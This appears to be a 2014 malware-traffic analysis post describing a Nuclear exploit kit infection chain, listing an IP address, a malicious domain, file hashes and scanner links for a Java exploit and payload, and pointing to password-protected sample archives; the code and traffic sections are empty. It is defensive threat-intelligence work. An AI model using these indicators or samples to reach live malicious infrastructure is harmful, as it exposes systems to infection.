2014-04-27 - NUCLEAR EK FROM 95.211.128.101 - BABYSERR.RU

ASSOCIATED FILES:

 

CHAIN OF EVENTS

ASSOCIATED DOMAINS:

TRAFFIC FROM COMPROMISED WEBSITE WITH MALICIOUS JAVASCRIPT:

REDIRECTS:

NUCLEAR EK:

POST-INFECTION CALLBACK:

 

PRELIMINARY MALWARE ANALYSIS

JAVA EXPLOIT

File name:  2014-04-27-Nuclear-EK-java-exploit.jar
File size:  13.0 KB ( 13317 bytes )
MD5 hash:  ca75e5cabe7f7b3b79204ca0c1e261a6
Detection ratio:  3 / 51
First submission:  2014-04-27 03:51:48 UTC
VirusTotal link:  https://www.virustotal.com/en/file/48ef7a7b737e1be53c0caa13d9f97648da3fa807f0eee560ea687d94accc9cd3/analysis/

 

MALWARE PAYLOAD

File name:  2014-04-27-Nuclear-EK-malware-payload.exe
File size:  71.4 KB ( 73064 bytes )
MD5 hash:  7209fa8fb92e878b84c0a0c71fd2622a
Detection ratio:  5 / 50
First submission:  2014-04-27 03:52:04 UTC
VirusTotal link:  https://www.virustotal.com/en/file/ee2ddb25183591dae8e3309b08592880699aa3484ae990f1f06e2c2e0bc93de3/analysis/
Malwr link:  https://malwr.com/submission/status/ZWFlZTQ2MDc0NTk2NDkxYWI5ZTU0MWIxMzM2Y2ViZTk/

 

SNORT EVENTS

SNORT EVENTS FOR THE INFECTION TRAFFIC (from Sguil on Security Onion)

 

HIGHLIGHTS FROM THE TRAFFIC

Javascript pointing to the redirect appears throughout traffic to the compromise website.  First, it appears in an .htaccess redirect from a search engine result:

 

Twice in the HTML for the main page:

 

This malicious javascript was also appended to every javascript file requested from the website.  Here's one example:

 

The redirect pointing to Nuclear EK:

 

Nuclear EK sends the Java exploit:

 

Java exploit delivers the malware:

 

HTTP headers for the post-infection callback look somewhat corrupt:

 

FINAL NOTES

Once again, here are links for the associated files:

ZIP files are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.

Click here to return to the main page.